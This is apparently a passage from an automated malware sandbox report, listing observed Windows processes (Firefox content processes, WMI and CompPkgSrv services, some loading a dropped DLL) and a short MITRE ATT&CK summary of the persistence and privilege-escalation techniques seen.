            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.3.234200603\422591941" -childID 2 -isForBrowser -prefsHandle 3556 -prefMapHandle 3552 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6167348f-ad46-4bfc-971b-a2be72548f21} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 3484 28567676e58 tab
            PID: 4576
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.4.140835392\1705947291" -childID 3 -isForBrowser -prefsHandle 5068 -prefMapHandle 5064 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68f6c326-69e5-470c-b78e-e28b72d1910b} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 5076 28568fc7358 tab
            PID: 5704
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.5.1746687221\1747408989" -childID 4 -isForBrowser -prefsHandle 5216 -prefMapHandle 5220 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa1346f3-695b-488b-954a-cc81120ff02e} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 5204 28569697758 tab
            PID: 5720
        [3] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.6.2020912841\812388391" -childID 5 -isForBrowser -prefsHandle 5424 -prefMapHandle 5428 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {370b495e-242e-4a44-b17f-d804208aaa8b} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 5416 28569696558 tab
            PID: 5728
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1520
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1920
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:5320
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Loads dropped DLL
PID:1272
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Downloads